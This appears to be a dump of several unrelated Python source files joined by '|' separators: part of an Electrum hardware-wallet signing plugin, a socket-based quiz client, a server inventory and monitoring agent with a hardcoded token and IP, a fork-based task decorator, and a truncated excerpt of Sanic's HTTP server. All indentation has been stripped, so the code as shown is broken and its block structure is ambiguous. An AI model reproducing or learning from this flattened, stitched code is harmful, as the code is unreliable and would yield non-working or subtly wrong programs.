outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 0):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_safet_input_script_type(txin['type'])
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_safet_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
UserClient.py
|
import socket
import time
import threading
from rwaFiles import *
from verifiers import *
from cipher import *
from colors import *
import getpass
HEADER = 4096
PORT = 5050
SERVER = socket.gethostbyname(socket.gethostname())
ADDR =(SERVER, PORT)
FORMAT = "utf-8"
DISCONNECT_MESSAGE = "!DISCONNECT"
print(f"Server : {SERVER}, Port : {PORT}")
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(ADDR)
timer = qzSettings(1)
stop_threads = False
############################################ Start of Countdown ############################################
def countdown():
global timer
global stop_threads
timer *= 60 # TIMER in minutes * 60 seconds
for i in range(timer):
timer-=1
time.sleep(1)
if stop_threads:
break
cdthread = threading.Thread(target = countdown) # threading target countdown TIMER function
def recv():
return client.recv(4096).decode(FORMAT)
def send_msg(msg):
message = msg.encode(FORMAT)
client.send(message)
print(recv())
condition = 'Start'
while condition == 'Start':
tOrF = True
while tOrF:
condition = input("Enter (a) to (c) to continue, (x) to exit: ")
# validate input
if condition == 'a' or condition =='b' or condition =='c' or condition =='x':
tOrF = False
else:
print("Please enter a proper value.")
while condition == 'a': #Start Quiz Application
tOrF = True
while tOrF:
print("\nEnter your user ID")
userID = input('\n>>> ')
commaVerifier = checkComma(userID)
if commaVerifier == True:
tOrF = True
else:
tOrF = False
tOrF = True
while tOrF:
print("\nEnter your user Password")
userPass = getpass.getpass('\n>>> ')
commaVerifier = checkComma(userPass)
if commaVerifier == True:
tOrF = True
else:
tOrF = False
login = f"{condition},{userID},{userPass}"
send_msg(login)
condition = 'attempt'
while condition == 'attempt':
condition = recv()
if condition == "User does not exist. Sending you back to main menu.\n[Main Menu]\na) Start Quiz Application\nb) Register User Account\nc) Reset Password\nx) Exit" or condition == "User exists but wrong password. Sending you back to main menu.\n[Main Menu]\na) Start Quiz Application\nb) Register User Account\nc) Reset Password\nx) Exit":
print(condition)
condition = 'Start'
elif condition == "User does not have anymore attempts left. Sending you back to main menu.\n[Main Menu]\na) Start Quiz Application\nb) Register User Account\nc) Reset Password\nx) Exit" or condition == "User exists but wrong password. Sending you back to main menu.\n[Main Menu]\na) Start Quiz Application\nb) Register User Account\nc) Reset Password\nx) Exit":
print(condition)
condition = 'Start'
elif condition == "Login successful.":
print(condition)
userInput = chooseQuizForUser()
if userInput == "View Previous Attempts":
send_msg(userInput)
print(recv())
condition = 'Start'
elif userInput == "Back to previous menu":
send_msg(userInput)
print(recv())
condition = 'Start'
elif userInput == "Exit":
send_msg(DISCONNECT_MESSAGE)
break
else:
send_msg(userInput)
quizInformation = recv()
sections = quizInformation.split(sep='|')
course = sections[0]
module = sections[1]
quizName = sections[2]
questions = sections[3]
individualQuestion = questions.split(sep='&&')
print(f"Course Name: {course}\nModule Name: {module}\nAssessment Component: {quizName}")
cdthread.start() # initiate threading function
print(styleStr((f"Time allowed: {qzSettings(1)} minute(s)."),rgb=(255,200,100)))# get timer from quiz setting
noOfQns = (len(individualQuestion))
answerList = ["0\n"] * noOfQns # IMPT
condition = 'startQuiz'
while condition == 'startQuiz':
qnNum = 0
while qnNum < noOfQns-1: #maybe put a -1 to noofqns
qnNum += 1
if individualQuestion[qnNum] == '':
pass
else:
qnPool = individualQuestion[qnNum].split(sep=',')
print(f'\n\tQuestion {qnNum}: '+qnPool[0]+'\n')
print(f'\ta) {qnPool[1]}\n\tb) {qnPool[2]}\n\tc) {qnPool[3]}\n\td) {qnPool[4]}\n')
usrAns = quizOption(qnNum,noOfQns-1)
if qnNum < noOfQns:
if usrAns == 'N':
qnNum += 0
elif usrAns == 'P':
if qnNum <=0:
pass
else:
qnNum -= 2
else:
answerList[qnNum] = usrAns
elif qnNum >= noOfQns:
print()
if timer == 0: # if TIMER reaches 0, auto submit quiz
print("You have ran out of time. Voiding this attempt.")
print("DISCONNECTING...")
time.sleep(3)
send_msg(DISCONNECT_MESSAGE)
exit()
qnNumber = 0
while qnNumber < noOfQns-1:
qnNumber += 1
qnPool = individualQuestion[qnNumber].split(sep=',')
print(f'\n\tQuestion {qnNumber}: '+qnPool[0]+'\n')
print(f'\ta) {qnPool[1]}\n\tb) {qnPool[2]}\n\tc) {qnPool[3]}\n\td) {qnPool[4]}\n\t(Your Answer) >>> {answerList[qnNumber]}')
condition = 'endQuiz'
while condition == 'endQuiz':
tOrF = True
while tOrF == True:
submission = input(styleStr(("\nEnter 0 to submit or 1 to make changes: "),rgb=(255,200,100))) # ask user to confirm submission or to change answer
if submission == "0":
tOrF = False
condition = 'printResults'
answerString = ''
for i in answerList:
answerString += f',{i}'
send_msg(answerString)
elif submission == "1":
tOrF = False
condition = 'startQuiz'
else:
print("Please enter a valid input.")
tOrF = True
while condition == 'printResults':
markAndPercentage = recv() # RECEIVE MESSAGE HERE
mApList = markAndPercentage.split(sep=',') # mApList stands for markAndPercentage's List
totalMarks = mApList[0]
percentage = float(mApList[1])
print(f'\nTotal Marks: {totalMarks}')
print(f"\nYou've scored {percentage}%.")
if percentage >= 50 and percentage < 60: # print out grade
print(styleStr(("That's a D grade. You can do better!"),rgb=(255,48,48)))
elif percentage >= 60 and percentage < 70:
print(styleStr(("That's a C grade. Keep it up!"),rgb=(48,249,255)))
elif percentage >= 70 and percentage < 80:
print(styleStr(("That's a B grade. Almost there!"),rgb=(235,255,48)))
elif percentage >= 80 and percentage <= 100:
print(styleStr(("That's an A grade. Good job!"),rgb=(55,255,48)))
else:
print("You have failed the test. Study harder!")
condition = 'askToTryAgain'
while condition == 'askToTryAgain':
tOrF = True
while tOrF:
userInput = input("Do you want to try again (y|n)? ")
tOrF = yOrN(userInput)
if userInput == 'y':
send_msg(userInput)
condition = "attempt"
# start new quiz
else:
stop_threads = True
cdthread.join()
send_msg(DISCONNECT_MESSAGE)
break
while condition == 'b': #Register User Account
# ask for username
tOrF = True
while tOrF:
print("\nEnter your desired user ID")
userID = input('\n>>> ')
commaVerifier = checkComma(userID)
if commaVerifier == True:
tOrF = True
else:
tOrF = False
# ask for Password
tOrF = True
while tOrF:
print("\nEnter your user Password")
userPass = input('\n>>> ')
tOrF = passcheck(userPass)
encryptedPass = encrypt(userPass)
tOrF = True
while tOrF == True:
scrtQn = input("\nPlease enter a secret recovery question.\n>>> ") # ask for secret question
verifyScrtQn = checkComma(scrtQn)
if verifyScrtQn == True:
print("Please do not enter a comma in your question.")
tOrF = True
else:
tOrF = False
tOrF = True
while tOrF == True:
scrtAns = input("\nPlease enter your secret question's answer.\n>>> ") # ask for secret question's answer
verifyScrtAns = checkComma(scrtAns)
if verifyScrtAns == True:
print("Please do not enter a comma in your answer.")
tOrF = True
else:
tOrF = False
# add the items together
newUser = f"{condition},{userID},{encryptedPass},{scrtQn},{scrtAns}"
#send to Server
send_msg(newUser)
condition = recv()
if condition == "\nUser ID is already taken. Sending you back to main menu.\n***Welcome to Quiz Application***\na) Start Quiz Application\nb) Register User Account\nc) Reset Password\nx) Exit":
print(condition)
condition = 'Start'
else:
print(condition)
condition = 'Start'
while condition == 'c': #Reset Password
# ask for user ID
tOrF = True
while tOrF:
print("\nEnter your user ID")
userID = input('\n>>> ')
commaVerifier = checkComma(userID)
if commaVerifier == True:
tOrF = True
else:
tOrF = False
# SEND user ID to server
resetPass = f"{condition},{userID}"
send_msg(resetPass)
# RECEIVE CONDITIONAL text from Server
condition = recv()
# if CONDITIONAL text == "User does not exist. Sending you back to main menu.\n[Main Menu]\na) Start Quiz Application\nb) Register User Account\nc) Reset Password\nx) Exit":
if condition == "User does not exist. Sending you back to main menu.\n[Main Menu]\na) Start Quiz Application\nb) Register User Account\nc) Reset Password\nx) Exit":
print(condition)
condition = 'Start'
# else:
else:
# print secret question
print('\n'+condition)
# ask for secret answer
secretAnswer = input("\n>>> ")
# SEND secret answer to Server
send_msg(secretAnswer)
# RECEIVE CONDITIONAL text from server
condition = recv()
# if CONDITIONAL text == 'NO':
if condition == 'Wrong answer. Sending you back to main menu.\n[Main Menu]\na) Start Quiz Application\nb) Register User Account\nc) Reset Password\nx) Exit"':
# print CONDITIONAL text; basically send back to main Menu
print(condition)
# else:
else:
# ask for new Password
print('\n'+condition)
tOrF = True
while tOrF:
userPass = input("\n>>> ")
# verify password strength if not ask for password agai
tOrF = passcheck(userPass)
# encrypt Password
encryptedPass = encrypt(userPass)
# SEND new encrypted password to server
send_msg(encryptedPass)
# RECEIVE confirmation text back from Server
confirmation = recv()
print(confirmation)
# go to main Menu
condition = 'Start'
while condition == 'x': # go back to main menu
send_msg('x')
break
#send_msg(DISCONNECT_MESSAGE)
|
adminset_agent.py
|
#!/usr/bin/env python
# coding=utf-8
import os, re, platform, socket, time, json, threading
import psutil, schedule, requests
from subprocess import Popen, PIPE
import logging
AGENT_VERSION = "0.21"
token = 'HPcWR7l4NJNJ'
server_ip = '192.168.47.130'
def log(log_name, path=None):
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(levelname)s %(message)s',
datefmt='%Y%m%d %H:%M:%S',
filename=path+log_name,
filemode='ab+')
return logging.basicConfig
log("agent.log", "/opt/adminset/client/")
def get_ip():
try:
hostname = socket.getfqdn(socket.gethostname())
ipaddr = socket.gethostbyname(hostname)
except Exception as msg:
print(msg)
ipaddr = ''
return ipaddr
def get_dmi():
p = Popen('dmidecode', stdout=PIPE, shell=True)
stdout, stderr = p.communicate()
return stdout
def parser_dmi(dmidata):
pd = {}
line_in = False
for line in dmidata.split('\n'):
if line.startswith('System Information'):
line_in = True
continue
if line.startswith('\t') and line_in:
k,v = [i.strip() for i in line.split(':')]
pd[k] = v
else:
line_in = False
return pd
def get_mem_total():
cmd = "grep MemTotal /proc/meminfo"
p = Popen(cmd, stdout=PIPE, shell = True)
data = p.communicate()[0]
mem_total = data.split()[1]
memtotal = int(round(int(mem_total)/1024.0/1024.0, 0))
return memtotal
def get_cpu_model():
cmd = "cat /proc/cpuinfo"
p = Popen(cmd, stdout=PIPE, stderr = PIPE, shell = True)
stdout, stderr = p.communicate()
return stdout
def get_cpu_cores():
cpu_cores = {"physical": psutil.cpu_count(logical=False) if psutil.cpu_count(logical=False) else 0, "logical": psutil.cpu_count()}
return cpu_cores
def parser_cpu(stdout):
groups = [i for i in stdout.split('\n\n')]
group = groups[-2]
cpu_list = [i for i in group.split('\n')]
cpu_info = {}
for x in cpu_list:
k, v = [i.strip() for i in x.split(':')]
cpu_info[k] = v
return cpu_info
def get_disk_info():
ret = []
cmd = "fdisk -l|egrep '^Disk\s/dev/[a-z]+:\s\w*'"
p = Popen(cmd, stdout=PIPE, stderr=PIPE, shell=True)
stdout, stderr = p.communicate()
for i in stdout.split('\n'):
disk_info = i.split(",")
if disk_info[0]:
ret.append(disk_info[0])
return ret
def post_data(url, data):
try:
r = requests.post(url, data)
if r.text:
logging.info(r.text)
else:
logging.info("Server return http status code: {0}".format(r.status_code))
except Exception as msg:
logging.info(msg)
return True
def asset_info():
data_info = dict()
data_info['memory'] = get_mem_total()
data_info['disk'] = str(get_disk_info())
cpuinfo = parser_cpu(get_cpu_model())
cpucore = get_cpu_cores()
data_info['cpu_num'] = cpucore['logical']
data_info['cpu_physical'] = cpucore['physical']
data_info['cpu_model'] = cpuinfo['model name']
data_info['ip'] = get_ip()
data_info['sn'] = parser_dmi(get_dmi())['Serial Number']
data_info['vendor'] = parser_dmi(get_dmi())['Manufacturer']
data_info['product'] = parser_dmi(get_dmi())['Version']
data_info['osver'] = platform.linux_distribution()[0] + " " + platform.linux_distribution()[1] + " " + platform.machine()
data_info['hostname'] = platform.node()
data_info['token'] = token
data_info['agent_version'] = AGENT_VERSION
return json.dumps(data_info)
def asset_info_post():
pversion = platform.python_version()
pv = re.search(r'2.6', pversion)
if not pv:
osenv = os.environ["LANG"]
os.environ["LANG"] = "us_EN.UTF8"
logging.info('Get the hardwave infos from host:')
logging.info(asset_info())
logging.info('----------------------------------------------------------')
post_data("http://{0}/cmdb/collect".format(server_ip), asset_info())
if not pv:
os.environ["LANG"] = osenv
return True
def get_sys_cpu():
sys_cpu = {}
cpu_time = psutil.cpu_times_percent(interval=1)
sys_cpu['percent'] = psutil.cpu_percent(interval=1)
sys_cpu['lcpu_percent'] = psutil.cpu_percent(interval=1, percpu=True)
sys_cpu['user'] = cpu_time.user
sys_cpu['nice'] = cpu_time.nice
sys_cpu['system'] = cpu_time.system
sys_cpu['idle'] = cpu_time.idle
sys_cpu['iowait'] = cpu_time.iowait
sys_cpu['irq'] = cpu_time.irq
sys_cpu['softirq'] = cpu_time.softirq
sys_cpu['guest'] = cpu_time.guest
return sys_cpu
def get_sys_mem():
sys_mem = {}
mem = psutil.virtual_memory()
sys_mem["total"] = mem.total/1024/1024
sys_mem["percent"] = mem.percent
sys_mem["available"] = mem.available/1024/1024
sys_mem["used"] = mem.used/1024/1024
sys_mem["free"] = mem.free/1024/1024
sys_mem["buffers"] = mem.buffers/1024/1024
sys_mem["cached"] = mem.cached/1024/1024
return sys_mem
def parser_sys_disk(mountpoint):
partitions_list = {}
d = psutil.disk_usage(mountpoint)
partitions_list['mountpoint'] = mountpoint
partitions_list['total'] = round(d.total/1024/1024/1024.0, 2)
partitions_list['free'] = round(d.free/1024/1024/1024.0, 2)
partitions_list['used'] = round(d.used/1024/1024/1024.0, 2)
partitions_list['percent'] = d.percent
return partitions_list
def get_sys_disk():
sys_disk = {}
partition_info = []
partitions = psutil.disk_partitions()
for p in partitions:
partition_info.append(parser_sys_disk(p.mountpoint))
sys_disk = partition_info
return sys_disk
# 函数获取各网卡发送、接收字节数
def get_nic():
key_info = psutil.net_io_counters(pernic=True).keys() # 获取网卡名称
recv = {}
sent = {}
for key in key_info:
recv.setdefault(key, psutil.net_io_counters(pernic=True).get(key).bytes_recv) # 各网卡接收的字节数
sent.setdefault(key, psutil.net_io_counters(pernic=True).get(key).bytes_sent) # 各网卡发送的字节数
return key_info, recv, sent
# 函数计算每秒速率
def get_nic_rate(func):
key_info, old_recv, old_sent = func() # 上一秒收集的数据
time.sleep(1)
key_info, now_recv, now_sent = func() # 当前所收集的数据
net_in = {}
net_out = {}
for key in key_info:
net_in.setdefault(key, (now_recv.get(key) - old_recv.get(key)) / 1024) # 每秒接收速率
net_out.setdefault(key, (now_sent.get(key) - old_sent.get(key)) / 1024) # 每秒发送速率
return key_info, net_in, net_out
def get_net_info():
net_info = []
key_info, net_in, net_out = get_nic_rate(get_nic)
for key in key_info:
in_data = net_in.get(key)
out_data = net_out.get(key)
net_info.append({"nic_name": key, "traffic_in": in_data, "traffic_out": out_data})
return net_info
def agg_sys_info():
logging.info('Get the system infos from host:')
sys_info = {'hostname': platform.node(),
'cpu': get_sys_cpu(),
'mem': get_sys_mem(),
'disk': get_sys_disk(),
'net': get_net_info(),
'token': token}
logging.info(sys_info)
json_data = json.dumps(sys_info)
logging.info('----------------------------------------------------------')
post_data("http://{0}/monitor/received/sys/info/".format(server_ip), json_data)
return True
def run_threaded(job_func):
job_thread = threading.Thread(target=job_func)
job_thread.start()
def get_pid():
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
pid = str(os.getpid())
with open(BASE_DIR+"/adminsetd.pid", "wb+") as pid_file:
pid_file.writelines(pid)
if __name__ == "__main__":
get_pid()
asset_info_post()
time.sleep(1)
agg_sys_info()
schedule.every(3600).seconds.do(run_threaded, asset_info_post)
schedule.every(300).seconds.do(run_threaded, agg_sys_info)
while True:
schedule.run_pending()
time.sleep(1)
|
task.py
|
# -*- coding: UTF-8 -*-
#
# Copyright © 2016 Alex Forster. All rights reserved.
# This software is licensed under the 3-Clause ("New") BSD license.
# See the LICENSE file for details.
#
import sys
import os
import time
import functools
import threading
import multiprocessing
import concurrent.futures
import six
from tblib.pickling_support import pickle_traceback, unpickle_traceback
from . import util
_pid = None
""":type: int"""
_thread = None
""":type: threading.Thread"""
_tasks = None
""":type: dict[int, tuple[multiprocessing.Connection, multiprocessing.Connection, concurrent.futures.Future]]"""
def _worker():
global _pid, _thread, _tasks
while True:
for child_pid, task in six.iteritems(_tasks.copy()):
future = task[0]
parent = task[1]
parent_ex = task[2]
if parent.poll():
try:
result = parent.recv()
parent.close()
parent_ex.close()
future.set_result(result)
del _tasks[child_pid]
continue
except EOFError:
pass
finally:
try:
os.waitpid(child_pid, 0)
except OSError:
pass
if parent_ex.poll():
try:
_, ex_value, ex_traceback = parent_ex.recv()
ex_traceback = unpickle_traceback(*ex_traceback)
parent.close()
parent_ex.close()
if six.PY2:
ex = ex_value
future.set_exception_info(ex, ex_traceback)
elif six.PY3:
ex = ex_value.with_traceback(ex_traceback)
future.set_exception(ex)
del _tasks[child_pid]
continue
except EOFError:
pass
finally:
try:
os.waitpid(child_pid, 0)
except OSError:
pass
time.sleep(0.001)
def _future(child_pid, parent, parent_ex):
""" :type parent: multiprocessing.Connection
:type parent_ex: multiprocessing.Connection
:rtype future: concurrent.futures.Future
"""
global _pid, _thread, _tasks
if _pid != os.getpid():
_tasks = {}
_pid = os.getpid()
_thread = threading.Thread(target=_worker, name='inparallel-{}'.format(os.getpid()))
_thread.setDaemon(True)
_thread.start()
future = concurrent.futures.Future()
future.set_running_or_notify_cancel()
_tasks[child_pid] = (future, parent, parent_ex)
return future
@util.decorator
def task(fn):
@six.wraps(fn)
def wrapper(*args, **kwargs):
global _pid, _thread, _tasks
parent, child = multiprocessing.Pipe()
parent_ex, child_ex = multiprocessing.Pipe()
child_pid = os.fork()
if child_pid == 0:
try:
child.send(fn(*args, **kwargs))
except Exception:
ex_type, ex_value, ex_traceback = sys.exc_info()
_, ex_traceback = pickle_traceback(ex_traceback)
child_ex.send((ex_type, ex_value, ex_traceback))
finally:
child.close()
child_ex.close()
if _thread:
util.raiseExceptionInThread(_thread, SystemExit)
_thread.join()
os._exit(0)
return _future(child_pid, parent, parent_ex)
return wrapper
|
server.py
|
import asyncio
import os
import traceback
from functools import partial
from inspect import isawaitable
from multiprocessing import Process
from signal import SIG_IGN, SIGINT, SIGTERM, Signals
from signal import signal as signal_func
from socket import SO_REUSEADDR, SOL_SOCKET, socket
from time import time
from httptools import HttpRequestParser
from httptools.parser.errors import HttpParserError
from multidict import CIMultiDict
from sanic.exceptions import (
InvalidUsage,
PayloadTooLarge,
RequestTimeout,
ServerError,
ServiceUnavailable,
)
from sanic.log import access_logger, logger
from sanic.request import Request, StreamBuffer
from sanic.response import HTTPResponse
try:
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except ImportError:
pass
class Signal:
stopped = False
class HttpProtocol(asyncio.Protocol):
"""
This class provides a basic HTTP implementation of the sanic framework.
"""
__slots__ = (
# event loop, connection
"loop",
"transport",
"connections",
"signal",
# request params
"parser",
"request",
"url",
"headers",
# request config
"request_handler",
"request_timeout",
"response_timeout",
"keep_alive_timeout",
"request_max_size",
"request_buffer_queue_size",
"request_class",
"is_request_stream",
"router",
"error_handler",
# enable or disable access log purpose
"access_log",
# connection management
"_total_request_size",
"_request_timeout_handler",
"_response_timeout_handler",
"_keep_alive_timeout_handler",
"_last_request_time",
"_last_response_time",
"_is_stream_handler",
"_not_paused",
"_request_handler_task",
"_request_stream_task",
"_keep_alive",
"_header_fragment",
"state",
"_debug",
)
def __init__(
self,
*,
loop,
request_handler,
error_handler,
signal=Signal(),
connections=None,
request_timeout=60,
response_timeout=60,
keep_alive_timeout=5,
request_max_size=None,
request_buffer_queue_size=100,
request_class=None,
access_log=True,
keep_alive=True,
is_request_stream=False,
router=None,
state=None,
debug=False,
**kwargs
):
self.loop = loop
self.transport = None
self.request = None
self.parser = None
self.url = None
self.headers = None
self.router = router
self.signal = signal
self.access_log = access_log
self.connections = connections or set()
self.request_handler = request_handler
self.error_handler = error_handler
self.request_timeout = request_timeout
self.request_buffer_queue_size = request_buffer_queue_size
self.response_timeout = response_timeout
self.keep_alive_timeout = keep_alive_timeout
self.request_max_size = request_max_size
self.request_class = request_class or Request
self.is_request_stream = is_request_stream
self._is_stream_handler = False
self._not_paused = asyncio.Event(loop=loop)
self._total_request_size = 0
self._request_timeout_handler = None
self._response_timeout_handler = None
self._keep_alive_timeout_handler = None
self._last_request_time = None
self._last_response_time = None
self._request_handler_task = None
self._request_stream_task = None
self._keep_alive = keep_alive
self._header_fragment = b""
self.state = state if state else {}
if "requests_count" not in self.state:
self.state["requests_count"] = 0
self._debug = debug
self._not_paused.set()
@property
def keep_alive(self):
"""
Check if the connection needs to be kept alive based on the params
attached to the `_keep_alive` attribute, :attr:`Signal.stopped`
and :func:`HttpProtocol.parser.should_keep_alive`
:return: ``True`` if connection is to be kept alive ``False`` else
"""
return (
self._keep_alive
and not self.signal.stopped
and self.parser.should_keep_alive()
)
# -------------------------------------------- #
# Connection
# -------------------------------------------- #
def connection_made(self, transport):
self.connections.add(self)
self._request_timeout_handler = self.loop.call_later(
self.request_timeout, self.request_timeout_callback
)
self.transport = transport
self._last_request_time = time()
def connection_lost(self, exc):
self.connections.discard(self)
if self._request_handler_task:
self._request_handler_task.cancel()
if self._request_stream_task:
self._request_stream_task.cancel()
if self._request_timeout_handler:
self._request_timeout_handler.cancel()
if self._response_timeout_handler:
self._response_timeout_handler.cancel()
if self._keep_alive_timeout_handler:
self._keep_alive_timeout_handler.cancel()
def pause_writing(self):
self._not_paused.clear()
def resume_writing(self):
self._not_paused.set()
def request_timeout_callback(self):
# See the docstring in the RequestTimeout exception, to see
# exactly what this timeout is checking for.
# Check if elapsed time since request initiated exceeds our
# configured maximum request timeout value
time_elapsed = time() - self._last_request_time
if time_elapsed < self.request_timeout:
time_left = self.request_timeout - time_elapsed
self._request_timeout_handler = self.loop.call_later(
time_left, self.request_timeout_callback
)
else:
if self._request_stream_task:
self._request_stream_task.cancel()
if self._request_handler_task:
self._request_handler_task.cancel()
self.write_error(RequestTimeout("Request Timeout"))
def response_timeout_callback(self):
# Check if elapsed time since response was initiated exceeds our
# configured maximum request timeout value
time_elapsed = time() - self._last_request_time
if time_elapsed < self.response_timeout:
time_left = self.response_timeout - time_elapsed
self._response_timeout_handler = self.loop.call_later(
time_left, self.response_timeout_callback
)
else:
if self._request_stream_task:
self._request_stream_task.cancel()
if self._request_handler_task:
self._request_handler_task.cancel()
self.write_error(ServiceUnavailable("Response Timeout"))
def keep_alive_timeout_callback(self):
"""
Check if elapsed time since last response exceeds our configured
maximum keep alive timeout value and if so, close the transport
pipe and let the response writer handle the error.
:return: None
"""
time_elapsed = time() - self._last_response_time
if time_elapsed < self.keep_alive_timeout:
time_left = self.keep_alive_timeout - time_elapsed
self._keep_alive_timeout_handler = self.loop.call_later(
time_left, self.keep_alive_timeout_callback
)
else:
logger.debug("KeepAlive Timeout. Closing connection.")
self.transport.close()
self.transport = None
# -------------------------------------------- #
# Parsing
# -------------------------------------------- #
def data_received(self, data):
# Check for the request itself getting too large and exceeding
# memory limits
self._total_request_size += len(data)
if self._total_request_size > self.request_max_size:
self.write_error(PayloadTooLarge("Payload Too Large"))
# Create parser if this is the first time we're receiving data
if self.parser is None:
assert self.request is None
self.headers = []
self.parser = HttpRequestParser(self)
# requests count
self.state["requests_count"] = self.state["requests_count"] + 1
# Parse request chunk or close connection
try:
self.parser.feed_data(data)
except HttpParserError:
message = "Bad Request"
if self._debug:
message += "\n" + traceback.format_exc()
self.write_error(InvalidUsage(message))
def on_url(self, url):
if not self.url:
self.url = url
else:
self.url += url
def on_header(self, name, value):
self._header_fragment += name
if value is not None:
if (
self._header_fragment == b"Content-Length"
and int(value) > self.request_max_size
):
self.write_error(PayloadTooLarge("Payload Too Large"))
try:
value = value.decode()
except UnicodeDecodeError:
value = value.decode("latin_1")
self.headers.append(
(self._header_fragment.decode().casefold(), value)
)
self._header_fragment = b""
def on_headers_complete(self):
self.request = self.request_class(
url_bytes=self.url,
headers=CIMultiDict(self.headers),
version=self.parser.get_http_version(),
method=self.parser.get_method().decode(),
transport=self.transport,
)
# Remove any existing KeepAlive handler here,
# It will be recreated if required on the new request.
if self._keep_alive_timeout_handler:
self._keep_alive_timeout_handler.cancel()
self._keep_alive_timeout_handler = None
if self.is_request_stream:
self._is_stream_handler = self.router.is_stream_handler(
self.request
)
if self._is_stream_handler:
self.request.stream = StreamBuffer(
self.request_buffer_queue_size
)
self.execute_request_handler()
def on_body(self, body):
if self.is_request_stream and self._is_stream_handler:
self._request_stream_task = self.loop.create_task(
self.body_append(body)
)
else:
self.request.body_push(body)
async def body_append(self, body):
if self.request.stream.is_full():
self.transport.pause_reading()
await self.request.stream.put(body)
self.transport.resume_reading()
else:
